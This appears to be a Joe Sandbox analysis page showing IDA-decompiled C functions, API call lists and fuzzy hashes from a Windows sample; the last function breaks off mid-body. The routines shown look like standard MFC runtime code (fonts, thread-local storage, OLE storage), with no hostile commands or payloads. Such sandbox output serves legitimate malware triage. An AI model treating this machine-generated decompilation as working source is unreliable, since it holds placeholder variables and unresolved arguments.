                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,004043B9,000000FF), ref: 00403923
                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00403941
                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0040394E
                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0040395B
                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00403968
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                      • API String ID: 667068680-3617302793
                                                      • Opcode ID: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
                                                      • Instruction ID: 27b4460d09b63384aa497d3741584d63de93aff5ce20b31730bd6aa59633142a
                                                      • Opcode Fuzzy Hash: 9e8a6484f6e270b6ce3c1298ae389152113c648ccd4b4fef4a6b7182860f7ced
                                                      • Instruction Fuzzy Hash: 0011C2B59816889FCB20DFA9AC80716BFFCA6D6706710503FE141B2660D6B80A40CB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00410BD8(intOrPtr __ecx, signed int _a4) {
                                                      				signed int _v8;
                                                      				char _v40;
                                                      				void _v68;
                                                      				intOrPtr _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t12;
                                                      				void* _t14;
                                                      				char* _t23;
                                                      				void* _t29;
                                                      				signed short _t30;
                                                      				struct HDC__* _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t12 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t12 ^ _t32;
                                                      				_t31 = GetStockObject;
                                                      				_t30 = 0xa;
                                                      				_v72 = __ecx;
                                                      				_t23 = "System";
                                                      				_t14 = GetStockObject(0x11);
                                                      				if(_t14 != 0) {
                                                      					L2:
                                                      					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                      						_t23 =  &_v40;
                                                      						_t31 = GetDC(0);
                                                      						if(_v68 < 0) {
                                                      							_v68 =  ~_v68;
                                                      						}
                                                      						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                      						ReleaseDC(0, _t31);
                                                      					}
                                                      					L6:
                                                      					_t16 = _a4;
                                                      					if(_a4 == 0) {
                                                      						_t16 = _t30 & 0x0000ffff;
                                                      					}
                                                      					return E0041E5DF(E00410A89(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                      				}
                                                      				_t14 = GetStockObject(0xd);
                                                      				if(_t14 == 0) {
                                                      					goto L6;
                                                      				}
                                                      				goto L2;
                                                      			}


















                                                      APIs
                                                      • GetStockObject.GDI32(00000011), ref: 00410BFE
                                                      • GetStockObject.GDI32(0000000D), ref: 00410C06
                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 00410C13
                                                      • GetDC.USER32(00000000), ref: 00410C22
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00410C36
                                                      • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00410C42
                                                      • ReleaseDC.USER32 ref: 00410C4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                      • String ID: System
                                                      • API String ID: 46613423-3470857405
                                                      • Opcode ID: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
                                                      • Instruction ID: a4a223aa5b9c112fe65b1d2b54281de720986542eecb78d2bebc38cd9b2bbfe9
                                                      • Opcode Fuzzy Hash: 72043efbff939c7958a5be734033e8eee520a78458b03bb95cc432acfe20bf1e
                                                      • Instruction Fuzzy Hash: F5118675700218EBEB149BA1DC45FEF7BB8AF54745F000126F601A7280EBB49D45CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E0040F361(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t36;
                                                      				void* _t39;
                                                      				long _t41;
                                                      				void* _t42;
                                                      				long _t47;
                                                      				void* _t53;
                                                      				signed int _t55;
                                                      				long* _t62;
                                                      				struct _CRITICAL_SECTION* _t64;
                                                      				void* _t65;
                                                      				void* _t66;
                                                      
                                                      				_push(0x10);
                                                      				E0041F71D(E0043284B, __ebx, __edi, __esi);
                                                      				_t62 = __ecx;
                                                      				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                      				_t64 = __ecx + 0x1c;
                                                      				 *(_t66 - 0x14) = _t64;
                                                      				EnterCriticalSection(_t64);
                                                      				_t36 =  *(_t66 + 8);
                                                      				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                      					_push(_t64);
                                                      				} else {
                                                      					_t65 = TlsGetValue( *_t62);
                                                      					if(_t65 == 0) {
                                                      						 *(_t66 - 4) = 0;
                                                      						_t39 = E0040F014(0x10);
                                                      						__eflags = _t39;
                                                      						if(__eflags == 0) {
                                                      							_t65 = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							 *_t39 = 0x436638;
                                                      							_t65 = _t39;
                                                      						}
                                                      						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                      						_t51 =  &(_t62[5]);
                                                      						 *(_t65 + 8) = 0;
                                                      						 *(_t65 + 0xc) = 0;
                                                      						E0040F130( &(_t62[5]), _t65);
                                                      						goto L5;
                                                      					} else {
                                                      						_t55 =  *(_t66 + 8);
                                                      						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                      							L5:
                                                      							_t75 =  *(_t65 + 0xc);
                                                      							if( *(_t65 + 0xc) != 0) {
                                                      								_t41 = E0040EAD1(_t51, __eflags, _t62[3], 4);
                                                      								_t53 = 2;
                                                      								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                      							} else {
                                                      								_t47 = E0040EAD1(_t51, _t75, _t62[3], 4);
                                                      								_pop(_t53);
                                                      								_t42 = LocalAlloc(0, _t47);
                                                      							}
                                                      							_t76 = _t42;
                                                      							if(_t42 == 0) {
                                                      								LeaveCriticalSection( *(_t66 - 0x14));
                                                      								_t42 = E004037AF(0, _t53, _t62, _t65, _t76);
                                                      							}
                                                      							 *(_t65 + 0xc) = _t42;
                                                      							E0041F330(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                      							 *(_t65 + 8) = _t62[3];
                                                      							TlsSetValue( *_t62, _t65);
                                                      							_t55 =  *(_t66 + 8);
                                                      						}
                                                      					}
                                                      					_t36 =  *(_t65 + 0xc);
                                                      					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                      						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                      					}
                                                      					_push( *(_t66 - 0x14));
                                                      				}
                                                      				LeaveCriticalSection();
                                                      				return E0041F7C2(_t36);
                                                      			}















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040F368
                                                      • EnterCriticalSection.KERNEL32(?,00000010,0040F604,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F379
                                                      • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F397
                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F3CB
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
                                                      • _memset.LIBCMT ref: 0040F456
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                      • String ID:
                                                      • API String ID: 1891723912-0
                                                      • Opcode ID: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
                                                      • Instruction ID: caa35618f7ee786639fd244a17305f6c3d39311c605f35e51643f12fe2b3081d
                                                      • Opcode Fuzzy Hash: a30d18387cbfc8e9af3b3761a0f603a792f816b1b476941ececd34ed3563fd41
                                                      • Instruction Fuzzy Hash: B331C374400605AFCB20AF50D885CAEB7A4FF54314B20C53FE956A7A90CB34AE95CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E0041C1DE(void* __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t42;
                                                      				void* _t46;
                                                      				void* _t47;
                                                      				void* _t52;
                                                      				intOrPtr _t66;
                                                      				intOrPtr _t74;
                                                      				void* _t76;
                                                      				void* _t96;
                                                      				void* _t97;
                                                      				intOrPtr* _t98;
                                                      				void* _t99;
                                                      				short* _t101;
                                                      				void* _t102;
                                                      				signed int _t103;
                                                      				void* _t105;
                                                      
                                                      				_t96 = __edx;
                                                      				_t103 = _t105 - 0x8c;
                                                      				_t42 =  *0x443590; // 0x8ffedb05
                                                      				 *(_t103 + 0x88) = _t42 ^ _t103;
                                                      				_t74 =  *((intOrPtr*)(_t103 + 0x98));
                                                      				_t101 =  *((intOrPtr*)(_t103 + 0x94));
                                                      				_push(_t97);
                                                      				E0041F330(_t97, _t101, 0, 0x20);
                                                      				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
                                                      				_t46 = E0040EC01(_t74, 0x437038);
                                                      				_t98 = __imp__#2;
                                                      				if(_t46 == 0) {
                                                      					_t78 = _t74;
                                                      					_t47 = E0040EC01(_t74, "dNC");
                                                      					__eflags = _t47;
                                                      					_push(0x100);
                                                      					_push(_t103 - 0x78);
                                                      					if(_t47 == 0) {
                                                      						_push(0xf108);
                                                      						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
                                                      						 *_t101 = 0xf108;
                                                      					} else {
                                                      						_push(0xf10a);
                                                      						E0040DDA7(_t74, _t78, _t98, _t101, _t103);
                                                      						 *_t101 = 0xf10a;
                                                      					}
                                                      				} else {
                                                      					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
                                                      					 *_t101 =  *((intOrPtr*)(_t74 + 8));
                                                      					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
                                                      					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
                                                      					_t66 =  *((intOrPtr*)(_t74 + 0x14));
                                                      					_t111 =  *((intOrPtr*)(_t66 - 0xc));
                                                      					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
                                                      						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      					_t74 =  *((intOrPtr*)(_t74 + 0x18));
                                                      					_t113 =  *((intOrPtr*)(_t74 - 0xc));
                                                      					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
                                                      						E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E004036AB(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
                                                      				_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      				_t114 =  *((intOrPtr*)(_t101 + 4));
                                                      				if( *((intOrPtr*)(_t101 + 4)) == 0) {
                                                      					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t114) + 0x10)));
                                                      					_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      				}
                                                      				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
                                                      					_t117 =  *((intOrPtr*)(_t101 + 0x10));
                                                      					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
                                                      						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E004036AB(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040DB94(0, _t98, _t101, _t117) + 4)) + 0x64)));
                                                      						_t52 = E00403036( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
                                                      					}
                                                      				}
                                                      				_pop(_t99);
                                                      				_pop(_t102);
                                                      				_pop(_t76);
                                                      				return E0041E5DF(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
                                                      			}























                                                      APIs
                                                      • _memset.LIBCMT ref: 0041C20D
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C25E
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C282
                                                        • Part of subcall function 004036AB: __EH_prolog3.LIBCMT ref: 004036B2
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C2DA
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C303
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0041C332
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AllocString$H_prolog3_memset
                                                      • String ID: dNC
                                                      • API String ID: 842698744-833669199
                                                      • Opcode ID: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
                                                      • Instruction ID: 9748dfd0f260f4af5954bde45890adc7de7677ef7dc0e4187cfbdd75b949ec51
                                                      • Opcode Fuzzy Hash: 69d7bbd4a819064c98fec3e3c2b11ca80eed0357c1c995ac8036d299fc764d85
                                                      • Instruction Fuzzy Hash: 394171309002089FCB34EFB9CC91A9EB7B4AF44318F10856FE465A72E2DB79A554CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00417FED(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				short* _t48;
                                                      				intOrPtr _t55;
                                                      				void* _t56;
                                                      				void* _t59;
                                                      
                                                      				_t59 = __eflags;
                                                      				_push(4);
                                                      				E0041F6EA(E00433268, __ebx, __edi, __esi);
                                                      				_t55 = __ecx;
                                                      				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
                                                      				E004048ED(__ecx, _t59);
                                                      				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
                                                      				 *((intOrPtr*)(_t56 - 4)) = 0;
                                                      				 *((intOrPtr*)(__ecx)) = 0x436c84;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t56 + 8));
                                                      				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x50)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x54)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x58)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x88)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x90)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x94)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x98)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                                                      				E00402890(__ecx + 0xa4);
                                                      				 *((char*)(_t56 - 4)) = 1;
                                                      				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
                                                      				E0041C6AB(__ecx + 0xbc);
                                                      				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0xc8)) = 0x436ab8;
                                                      				 *((intOrPtr*)(__ecx + 0xcc)) = 0x436c04;
                                                      				 *((intOrPtr*)(__ecx + 0xd0)) = 0x436ae0;
                                                      				 *((intOrPtr*)(__ecx + 0xd4)) = 0x436b0c;
                                                      				 *((intOrPtr*)(__ecx + 0xd8)) = 0x436b2c;
                                                      				 *((intOrPtr*)(__ecx + 0xdc)) = 0x436b44;
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x436b64;
                                                      				_t48 = __ecx + 0xac;
                                                      				 *((intOrPtr*)(__ecx + 0xe4)) = 0x436b78;
                                                      				 *((intOrPtr*)(__ecx + 0xe8)) = 0x436ba4;
                                                      				E0041F330(0, _t48, 0, 0x10);
                                                      				 *_t48 = 0;
                                                      				return E0041F7C2(_t55);
                                                      			}








                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_memset
                                                      • String ID: ,kC$DkC$dkC$xkC$jC
                                                      • API String ID: 2828583354-3858571362
                                                      • Opcode ID: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
                                                      • Instruction ID: 4e71a2d175be7ae7ae6f7a1d80f1dc51b3f0f7cb739eefa1d1a8814e24de44bf
                                                      • Opcode Fuzzy Hash: 98e60aecb42fe353695eeb357c2788e09d8f2f2acdddc0c39202814f6abeb3dc
                                                      • Instruction Fuzzy Hash: E73190B0801B51DAD320DF2AC54578AFBE4BFA5308F11DA0FD1EA97661C7B86149CF29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E004148AC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t114;
                                                      				intOrPtr _t118;
                                                      				intOrPtr* _t119;
                                                      				void* _t120;
                                                      				intOrPtr* _t121;
                                                      				void* _t122;
                                                      				intOrPtr* _t125;
                                                      				intOrPtr* _t127;
                                                      				void _t129;
                                                      				intOrPtr* _t131;
                                                      				long _t134;
                                                      				void* _t135;
                                                      				void* _t136;
                                                      				void* _t137;
                                                      				void _t139;
                                                      				void _t141;
                                                      				void* _t143;
                                                      				void* _t144;
                                                      				void* _t147;
                                                      				void* _t148;
                                                      				void _t149;
                                                      				void* _t151;
                                                      				intOrPtr* _t153;
                                                      				void* _t154;
                                                      				void _t158;
                                                      				void* _t159;
                                                      				void _t161;
                                                      				intOrPtr* _t163;
                                                      				void* _t168;
                                                      				intOrPtr* _t170;
                                                      				intOrPtr* _t172;
                                                      				intOrPtr* _t174;
                                                      				void* _t175;
                                                      				intOrPtr _t186;
                                                      				intOrPtr* _t206;
                                                      				void* _t210;
                                                      				intOrPtr* _t219;
                                                      				intOrPtr* _t221;
                                                      				void* _t222;
                                                      				void* _t224;
                                                      
                                                      				_push(0x68);
                                                      				_t114 = E0041F6EA(E00432DB2, __ebx, __edi, __esi);
                                                      				_t221 = __ecx;
                                                      				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
                                                      				_t219 = __ecx + 0x50;
                                                      				 *(_t224 - 0x10) = 0;
                                                      				if( *_t219 != 0) {
                                                      					L2:
                                                      					 *(_t224 + 8) = 0;
                                                      					 *(_t224 - 0x14) = 0;
                                                      					 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                      					E00413164(_t221, _t221 + 0x40);
                                                      					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
                                                      					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
                                                      					if(_t118 != 0) {
                                                      						L5:
                                                      						_t222 =  *(_t224 + 0xc);
                                                      						if(_t222 == 0) {
                                                      							__eflags =  *(_t224 + 0x10);
                                                      							if( *(_t224 + 0x10) != 0) {
                                                      								L16:
                                                      								_t119 =  *_t219;
                                                      								_t210 = _t224 - 0x14;
                                                      								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x439410, _t210);
                                                      								__eflags = _t120;
                                                      								if(_t120 < 0) {
                                                      									L43:
                                                      									if( *(_t224 - 0x10) >= 0) {
                                                      										L46:
                                                      										_t121 =  *((intOrPtr*)(_t224 + 0x14));
                                                      										if(_t121 != 0) {
                                                      											 *((intOrPtr*)( *_t121 + 8))(_t121);
                                                      										}
                                                      										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
                                                      											 *(_t224 - 0x10) = 1;
                                                      										}
                                                      										_t122 =  *(_t224 - 0x10);
                                                      										L52:
                                                      										return E0041F7C2(_t122);
                                                      									}
                                                      									L44:
                                                      									_t125 =  *_t219;
                                                      									if(_t125 != 0) {
                                                      										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
                                                      										_t127 =  *_t219;
                                                      										 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                      										 *_t219 = 0;
                                                      									}
                                                      									goto L46;
                                                      								}
                                                      								__eflags = _t222;
                                                      								if(_t222 != 0) {
                                                      									__eflags =  *(_t224 + 0x10);
                                                      									if( *(_t224 + 0x10) == 0) {
                                                      										 *(_t224 - 0x10) = 0x8000ffff;
                                                      										L37:
                                                      										_t129 =  *(_t224 - 0x14);
                                                      										L38:
                                                      										 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                      										L39:
                                                      										if( *(_t224 - 0x10) < 0) {
                                                      											goto L44;
                                                      										}
                                                      										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
                                                      											_t186 =  *((intOrPtr*)(_t224 - 0x24));
                                                      											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
                                                      												_t131 =  *_t219;
                                                      												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
                                                      											}
                                                      										}
                                                      										goto L43;
                                                      									}
                                                      									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
                                                      									__eflags = _t210;
                                                      									 *(_t224 - 0x2c) = _t134;
                                                      									if(__eflags > 0) {
                                                      										L29:
                                                      										 *(_t224 - 0x10) = 0x8007000e;
                                                      										 *(_t224 + 0x10) = 0;
                                                      										L30:
                                                      										__eflags =  *(_t224 + 0x10);
                                                      										 *(_t224 - 0x1c) = 0;
                                                      										if( *(_t224 + 0x10) == 0) {
                                                      											goto L37;
                                                      										}
                                                      										_t135 = _t224 - 0x1c;
                                                      										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
                                                      										__eflags = _t135;
                                                      										 *(_t224 - 0x10) = _t135;
                                                      										if(_t135 < 0) {
                                                      											goto L37;
                                                      										}
                                                      										_t136 = _t224 - 0x18;
                                                      										 *(_t224 - 0x18) = 0;
                                                      										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
                                                      										__eflags = _t136;
                                                      										 *(_t224 - 0x10) = _t136;
                                                      										if(_t136 >= 0) {
                                                      											_t139 =  *(_t224 - 0x14);
                                                      											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
                                                      											_t141 =  *(_t224 - 0x18);
                                                      											 *((intOrPtr*)( *_t141 + 8))(_t141);
                                                      										}
                                                      										_t137 =  *(_t224 - 0x1c);
                                                      										L35:
                                                      										 *((intOrPtr*)( *_t137 + 8))(_t137);
                                                      										goto L37;
                                                      									}
                                                      									if(__eflags < 0) {
                                                      										L26:
                                                      										_t143 = GlobalAlloc(0, _t134);
                                                      										__eflags = _t143;
                                                      										 *(_t224 + 0x10) = _t143;
                                                      										if(_t143 == 0) {
                                                      											goto L29;
                                                      										}
                                                      										_t144 = GlobalLock(_t143);
                                                      										__eflags = _t144;
                                                      										if(_t144 == 0) {
                                                      											goto L29;
                                                      										}
                                                      										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
                                                      										GlobalUnlock( *(_t224 + 0x10));
                                                      										goto L30;
                                                      									}
                                                      									__eflags = _t134 - 0xffffffff;
                                                      									if(_t134 >= 0xffffffff) {
                                                      										goto L29;
                                                      									}
                                                      									goto L26;
                                                      								}
                                                      								_t147 = _t224 + 0xc;
                                                      								 *(_t224 + 0xc) = 0;
                                                      								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
                                                      								__eflags = _t147;
                                                      								 *(_t224 - 0x10) = _t147;
                                                      								if(_t147 < 0) {
                                                      									goto L37;
                                                      								}
                                                      								_t148 = _t224 + 0x10;
                                                      								 *(_t224 + 0x10) = 0;
                                                      								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
                                                      								__eflags = _t148;
                                                      								 *(_t224 - 0x10) = _t148;
                                                      								if(_t148 >= 0) {
                                                      									_t149 =  *(_t224 - 0x14);
                                                      									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
                                                      									_t151 =  *(_t224 + 0x10);
                                                      									 *((intOrPtr*)( *_t151 + 8))(_t151);
                                                      								}
                                                      								_t137 =  *(_t224 + 0xc);
                                                      								goto L35;
                                                      							}
                                                      							L11:
                                                      							_t153 =  *_t219;
                                                      							_t213 = _t224 + 8;
                                                      							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x4394a0, _t224 + 8);
                                                      							__eflags = _t154;
                                                      							if(_t154 < 0) {
                                                      								goto L16;
                                                      							} else {
                                                      								__eflags = _t222;
                                                      								if(__eflags != 0) {
                                                      									E00411776(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
